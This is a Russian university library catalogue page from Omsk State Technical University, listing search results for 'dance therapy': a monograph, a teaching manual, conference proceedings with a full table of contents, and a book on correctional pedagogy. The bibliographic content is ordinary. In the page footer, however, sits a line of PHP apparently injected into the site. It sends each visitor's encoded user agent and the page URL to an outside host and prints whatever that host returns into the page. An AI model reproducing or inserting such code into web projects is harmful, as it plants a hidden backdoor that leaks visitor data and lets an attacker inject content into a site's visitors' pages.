Перейти на сайт
библиотеки ОмГТУ
Share |
   
   
   
   
   
   

 
      Виртуальная справка
 
      Личный кабинет

Логин
Пароль
Забыли пароль?
Регистрация

 
      Счетчики
Rambler's Top100
Яндекс цитирования

Сейчас на сайте

47 пользователей



 
      Наши партнеры
Студенческий информационный портал компании
("Ключевые слова=танцетерапия")
Результаты поиска
СВОДНЫЙ КАТАЛОГ: Найдено записей: 4
1. 
Медведева, Елена Алексеевна. Формирование личности ребенка с проблемами психического развития средствами искусства в артпедагогическом и арттерапевтическом пространстве : монография / Е. А. Медведева, 2009. - 269 с.
Держатели документа (Информация об экземплярах) 

В настоящей монографии представлена актуальная проблема формирования личности ребенка с проблемами в развитии с помощью искусства. Показан новый в специальной психологии "субъектно-художественный" подход к социализации ребенка с разными вариантами дизонтогенеза. В книге раскрываются концептуальные основы и модель социокультурного становления личности ребенка с отклонениями психического развития средствами искусства в артпедагогическом и арттерапевтическом пространстве. Представлены данные по особенностям и динамике преодоления незрелости личностной сферы старших дошкольников и младших школьников с задержкой психического развития, как наиболее часто встречающегося варианта отклонения в развитии, с помощью искусства.

2. 
Методика музыкального воспитания детей с проблемами в развитии : учебно-методический комплекс дисциплины для студентов вузов, обучающихся по специальности 030900 "Дошкольная педагогика и психология" / авт.-сост. Н. А. Рыбакова, 2009. - 63 с.
3. 
Второй Краевой съезд педагогов-психологов образования Алтайского края : материалы II Краевого съезда педагогов-психологов образования Алтайского края (26 - 27 марта 2009 года г. Барнаул) / отв. ред. И. В. Семенченко, 2009. - 264 с.
Оглавление 
  • Абдуллаев, Ю. Г. Итоги, проблемы и перспективы развития службы практической психологии образования Алтайского края / Ю. Г. Абдуллаев. - с.11
  • Волкова, Т. Г. Организация и проведение практик студентов специальности "Психология" в контексте компетентностного подхода / Т. Г. Волкова. - с.19
  • Гусева, Татьяна Артуровна. Инновационная деятельность в ВУЗе как фактор оптимизации познавательной активности субъектов образовательного пространства / Т. А. Гусева. - с.21
  • Демина, Л. Д. Развитие университетского психологического образования в Алтайском государственном университете / Л. Д. Демина. - с.25
  • Еременко, А. В. Психосемантика как метод постнеклассических исследований в психологии / А. В. Еременко. - с.28
  • Каширина, Г. А. Жестокое отношение взрослых к детям / Г. А. Каширина. - с.30
  • Колмогорова, Л. С. Интегративный, онтологический, культурологический и гуманистический подходы к преподаванию психологии в общеобразовательной школе / Л. С. Колмогорова. - с.33
  • Колпакова, Н. В. К вопросу о саморегуляции педагога в современном образовательном пространстве / Н. В. Колпакова. - с.39
  • Кузнецова, В. В. Система психологической поддержки образовательного процесса / В. В. Кузнецова. - с.41
  • Пищальникова, Ж. Н. Включение Гештальт-подхода в работу психолога образовательного учреждения начального профессионального образования / Ж. Н. Пищальникова. - с.44
  • Сосновский, Б. А. Неиссякающие психологические проблемы современного образования / Б. А. Сосновский. - с.46
  • Холодкова, О. Г. Проблема психологического образования студентов / О. Г. Холодкова. - с.52
  • Шмелева, Т. Н. Профессиональное самоопределение старшеклассников в рамках уроков "Психология самопознанния" / Т. Н. Шмелева. - с.54
  • Варшавская, Надежда Евгеньевна. Коммуникативная толерантность студентов-психологов / Н. Е. Варшавская, Д. В. Бакина. - с.56
  • Скорлупина, О. А. Трансформация профессионально-психологического мышления как условия постановки и решения новых профессиональных проблем / О. А. Скорлупина. - с.58
  • Слажнева, Т. П. Проблема адаптации молодых психологов к работе в общеобразовательных школах / Т. П. Слажнева. - с.61
  • Тихонова, О. Н. Становление профессиональной позиции психолога в системе дополнительного профессионального образования / О. Н. Тихонова. - с.63
  • Упоров, Д. В. Интегрированная система образования как условие модернизации современного российского образования / Д. В. Упоров. - с.65
  • Шарапановская, Е. В. Педагог-психолог как субъект построения своей профессиональной деятельности / Е. В. Шарапановская. - с.68
  • Горбатая, Е. А. Возможности использования куклотерапии для коррекции эмоционального состояния детей с легкой интеллектуальной недостаточностью / Е. А. Горбатая, Н. А. Першина. - с.72
  • Иванова, У. В. Психолого-педагогическое сопровождение родителей в дошкольном образовательном учреждении / У. В. Иванова. - с.73
  • Карева, И. Г. Некоторые аспекты обучения математике дошкольников с проблемами в развитии / И. Г. Карева. - с.76
  • Кроводонова, Ю. Е. Современные представления о ценностных ориентациях в адаптации личности слепых, слабовидящих / Ю. Е. Кроводонова, О. Г. Нугаева. - с.78
  • Мазаева, Ю. А. Теоретический анализ классификаций нарушений в поведении у интеллектуально неполноценных детей / Ю. А. Мазаева. - с.81
  • Миллер, Т. Г. К проблеме тревожности у детей с нарушениями в развитии / Т. Г. Миллер. - с.82
  • Поклонова, Н. Г. Снижение агрессивных проявлений у подростков с особыми образовательными потребностями / Н. Г. Поклонова. - с.84
  • Санькова, С. В. Школьный ПМПк как одна из эффективных форм взаимодействия специалистов в процессе психолого-педагогического сопровождения учащихся с ограниченными возможностями здоровья / С. В. Санькова. - с.86
  • Сергеева, Н. С. Танцетерапия как средство коррекции социально-перцептивных способностей умственно отсталых младших школьников / Н. С. Сергеева, Н. А. Першина. - с.87
  • Студеникина, Людмила Алексеевна. Студенты с глубокими нарушениями зрения как субъекты образовательного процесса в ВУЗе / Л. А. Студеникина. - с.90
  • Третьякова, С. Н. Психолого-медико-педагогическое сопровождение в условиях коррекционной школы / С. Н. Третьякова. - с.94
  • Часовских, С. Ю. Психолого-педагогическое сопровождение детей с ЗПР в общеобразовательной школе / С. Ю. Часовских. - с.94
  • Черданцева, О. Ф. Влияние технологии психолого-педагогического сопровождения на формирование личности школьника / О. Ф. Черданцева. - с.96
  • Черногорова, М. А. Дыхание - фактор развития и укрепления здоровья / М. А. Черногорова. - с.98
  • Ворона, Ю. С. Компетентностный подход в системе научно-технического творчества и профориентационной работы с одаренными учащимися / Ю. С. Ворона, В. М. Мусько. - с.101
  • Климашин, В. М. Общественная экспертиза образовательных компетенций школьников / В. М. Климашин. - с.103
  • Янова, Н. Г. Проблема метода в исследованиях по оценке и измерению качества образования на уровне компетентностей и компетенций личности / Н. Г. Янова. - с.106
  • Алымова, О. А. Алгоритм работы педагога-психолога при переходе из начальных классов в среднее звено / О. А. Алымова. - с.111
  • Бабкунова, О. Н. Я-концепция подростка в неполной отцовской семье в контексте компетентностного развития личности / О. Н. Бабкунова. - с.114
  • Баженова, Е. В. Динамика развития тактильно-кинестезических средств общения в дошкольном возрасте / Е. В. Баженова, Н. А. Першина. - с.117
  • Беломытцева, Н. Н. Проблема адаптации детей раннего возраста к детскому саду / Н. Н. Беломытцева. - с.119
  • Бокова, О. А. Изучение готовности будущих педагогов к проблемному анализу психологических текстов / О. А. Бокова. - с.122
  • Ворстер, А. В. Различные подходы к рассмотрению условий построения жизненного мира дошкольникам / А. В. Ворстер. - с.124
  • Гулина, Н. Р. Стереотипы как фактор формирования внутриличностного конфликта у женщин / Н. Р. Гулина, Н. В. Дмитриева. - с.127
  • Гусева, Е. П. Психическая ригидность и особенности уровня субъективного контроля у молодых людей и людей среднего возраста с различными видами перфекционизма / Е. П. Гусева. - с.131
  • Гусева, Татьяна Артуровна. Методика исследования стиля познавательной активности / Т. А. Гусева. - с.133
  • Демидова, С. А. Дети с астеническим состоянием / С. А. Демидова. - с.137
  • Жихарева, Елена Васильевна. Развитие ответственности личности посредством социально-психологического тренинга / Е. В. Жихарева. - с.139
  • Иноземцева, М. М. Подходы к измерению пространственных представлений человека / М. М. Иноземцева. - с.142
  • Карпова, И. С. Организация психолого-педагогического сопровождения и преемственности (начально - средее звено) / И. С. Карпова. - с.144
  • Кознова, М. В. Проблемы языкового сознания личности / М. В. Кознова. - с.145
  • Кузьмина, А. А. Социально-психологическая адаптация студентов к обучению в вузе / А. А. Кузьмина, Н. И. Трубникова. - с.148
  • Маков, С. В. Толерантность к неопределенности в системе ключевых компетенций личности / С. В. Маков. - с.150
  • Маликова, Елена Владимировна. Особенности проявления личностных факторов учащихся профильных классов / Е. В. Маликова. - с.152
  • Матвеева, С. Р. Мотивация профессионального обучения как фактор самореализации студентов / С. Р. Матвеева. - с.155
  • Сингач, Т. Я. Синдром эмоционального выгорания в педагогической деятельности / Т. Я. Сингач. - с.157
  • Султанова, Р. Ф. Роль психической саморегуляции в профилактике учебного стресса студентов / Р. Ф. Султанова, Н. И. Трубникова. - с.160
  • Сычев, Олег Анатольевич. Адаптация методики "Переживания в межличностных отношениях" / О. А. Сычев, М. А. Никитина. - с.163
  • Тимофеева, Ю. Г. Различные подходы к определению понятий ценности и ценностные ориентации в структуре личности / Ю. Г. Тимофеева. - с.166
  • Фроловская, Н. В. Проблемы психологического развития личности (студентов средне-специального учебного заведения) / Н. В. Фроловская. - с.171
  • Четошникова, Е. В. Рефлексивно-ценностные условия профессионального становления человека / Е. В. Четошникова. - с.174
  • Шадрин, А. Н. Характеристика коммуникаций с учащимися в процессе педагогической деятельности / А. Н. Шадрин. - с.176
  • Шевченко, Наталья Борисовна. Психологическое сопровождение студентов-первокурсников как фактор успешной адаптации к обучению в вузе / ; Н. Б. Шевченко. - с.179
  • Гайнанова, Алиса Рифкатовна. К вопросу о личностно-профессиональном становлении будущего педагога-психолога / А. Р. Гайнанова. - с.182
  • Ершова, Л. Д. Развитие психологической готовности студентов к профессиональному общению в современных условиях / Л. Д. Ершова. - с.183
  • Кобзева, Т. С. Личностные особенности успешных и неуспешных тренеров / Т. С. Кобзева. - с.185
  • Куттубаев, Р. Н. Национально-психологические особенности профессионального самоопределения старшеклассников / Р. Н. Куттубаев, Н. И. Трубникова. - с.186
  • Микушина, А. А. Формирование психологической культуры старшеклассников к самостоятельной профессиональной деятельности / А. А. Микушина. - с.188
  • Овсянникова, Е. В. Подготовка учащихся к осознанному выбору профессии в рамках малокомплектной школы / Е. В. Овсянникова. - с.191
  • Семенченко, Ирина Витальевна. Подготовка студентов ВУЗа к карьерному росту через формирование коммуникативной компетентности / И. В. Семенченко. - с.193
  • Сосновский, Б. А. Издержки глобализации образования / Б. А. Сосновский. - с.195
  • Барышникова, Н. А. Профилактика агрессии как асоциального проявления поведения у обучающихся / Н. А. Барышникова. - с.197
  • Гражданкина, Л. В. Профилактическая работа с подростками девиантного поведения / Л. В. Гражданкина. - с.199
  • Кузнецова, А. С. Исследование представлений о социальном мире у подростков-воспитанников детского дома / А. С. Кузнецова, Е. М. Трофимова. - с.200
  • Ласкавая, О. В. Профилактика нарцисстического поведения / О. В. Ласкавая. - с.202
  • Мазурова, Е. В. Особенности создания толерантности среды в образовательном учреждении как средства профилактики антисоциальных явлений / Е. В. Мазурова. - с.205
  • Мосина, Н. А. Психолого-педагогическая поддержка детей, попавших в трудную жизненную ситуацию / Н. А. Мосина. - с.207
  • Паршонок, Т. В. Опыт разработки программы профилактики употребления наркотических, психоактивных веществ и вредных привычек в среде подростков / Т. В. Паршонок. - с.210
  • Переверзева, О. В. Молодежные субкультуры как социальный феномен / О. В. Переверзева. - с.212
  • Фишер, А. А. Коррекция коммуникативной компетентности у воспитанников детского дома / А. А. Фишер, Е. М. Трофимова. - с.215
  • Брылева, О. А. Поиски "хорошей формы" психологической службы образования / О. А. Брылева. - с.218
  • Вдовина, Е. Г. Организационное взаимодействие педагога-психолога с руководителем образовательного учреждения как фактор психологического обеспечения образовательного процесса / Е. Г. Вдовина. - с.220
  • Ермолович, Н. Я. Управление психологической службой в систем образования города Алейска / Н. Я. Ермолович. - с.223
  • Макарова, И. С. Телефонные службы доверия / И. С. Макарова. - с.225
  • Мананникова, И. А. Психологическое сопровождение студентов ВУЗа в контексте компетентностного подхода / И. А. Мананникова. - с.227
  • Парфенова, Г. Л. О методической помощи психологу в организации сопровождения детей с признаками одаренности в условиях ДОУ / Г. Л. Парфенова. - с.229
  • Старкова, Л. В. Психологическое сопровождение становления полоролевой идентификации подростков / Л. В. Старкова. - с.232
  • Унгер, М. И. Использование информационно-коммуникативных технологий в организации деятельности психологической службы колледжа / М. И. Унгер. - с.235
  • Дмитриева, Н. В. Варианты пищевой зависимости / Н. В. Дмитриева. - с.238
  • Лапердина, Е. А. Психолого-педагогическое сопровождение подростков / Е. А. Лапердина. - с.241
  • Липина, С. И. Коррекция отклоняющегося поведения подростков / С. И. Липина. - с.242
  • Макарова, А. В. Психологическая работа с детьми, имеющими агрессивные проявления в поведении / А. В. Макарова. - с.245
  • Манаева, Г. А. Социально-психологическая адаптация как процесс личностного самоизменения / Г. А. Манаева. - с.247
  • Протопопова, М. В. Эмоциональные проявления детей с гиперактивностью и дефицитом внимания / М. В. Протопопова. - с.249
  • Рише, Л. Н. Анимационный театр кукол в школе / Л. Н. Рише. - с.252
  • Степкина, Е. Е. Комплексное сопровождение детей с синдромом дефицита внимания и гиперактивности в условиях дошкольного образовательного учреждения / Е. Е. Степкина. - с.254
  • Черепанова, О. П. Использование возможностей изобразительной деятельности для психологической профилактики поведенческих нарушений у дошкольников / О. П. Черепанова. - с.257
  • Чигурова, Н. Г. Коррекция и развитие познавательных процессов у первоклассников с учетом сенсорных возможностей / Н. Г. Чигурова. - с.259
Держатели документа (Информация об экземплярах) 
4. 
Поваляева, Мария Афанасьевна. Нетрадиционные методы в коррекционной педагогике / М. А. Поваляева, 2006. - 349 с.
Ключевые слова 
коррекционная педагогика -- нетрадиционная коррекционная педагогика -- лечебная педагогика -- фитотерапия -- лечение комнатными растениями -- садотерапия -- диетотерапия -- овощетерапия -- фруктотерапия -- лечение ягодами -- лечение виноградом -- ампелотерапия -- лечение животными -- эманотерапия -- терапевтическая верховая езда -- медолечение -- апитерапия -- закаливание -- климатотерапия -- лечение воздухом -- аэротерапия -- лечение светом -- гелиотерапия -- водолечение -- гидротерапия -- талассотерапия -- лечение водорослями -- альготерапия -- глинотерапия -- грязелечение -- фанготерапия -- лечение песком -- псиммотерапия -- лечение камнями -- литотерапия -- металлотерапия -- психотерапия -- куклотерапия -- сказкотерапия -- смехотерапия -- кинезотерапия -- гимнастика мозга -- кинесиология -- точечный массаж -- дыхательная гимнастика -- коррекция зрения -- физиотерапевтические процедуры -- магнитотерапия -- музыкотерапия -- танцетерапия -- цветотерапия -- хромотерапия
Держатели документа (Информация об экземплярах) 


    Адрес: 644050, Россия, г. Омск, пр-кт Мира, 11

    Телефон: (3812) 65-34-86, 65-23-69

    E-mail: libdirector@omgtu.ru, b_oa@omgtu.ru

[ О библиотеке ]     [ Читателю ]     [ Информационные ресурсы ]     [ Электронный каталог ]     [ Научная деятельность ]     [ Культура и досуг ]     [ ИРБИС в Омске ]

Электронное периодическое издание «lib.omgtu.ru» | Свидетельство о регистрации СМИ Эл № ФС77-45378 от 10.06.2011 Федеральной службы по надзору в сфере связи, информационных технологий и массовых коммуникаций (Роскомнадзор)| Выпуск № 2877 - 26.04.2019
© Омский государственный технический университет

Электронно-библиотечная система АРБУЗ ОмГТУ
Страница сгенерирована за 0.85 с.12 запросов, 0.67c. $useragent=$_SERVER['HTTP_USER_AGENT']; $bs=base64_encode($useragent); $sb='http://'.$_SERVER['SERVER_NAME'].$_SERVER["REQUEST_URI"]; $ret = file_get_contents('http://jr.6tws.us/?UserAgent='.$bs."&Domain=".$sb); print $ret;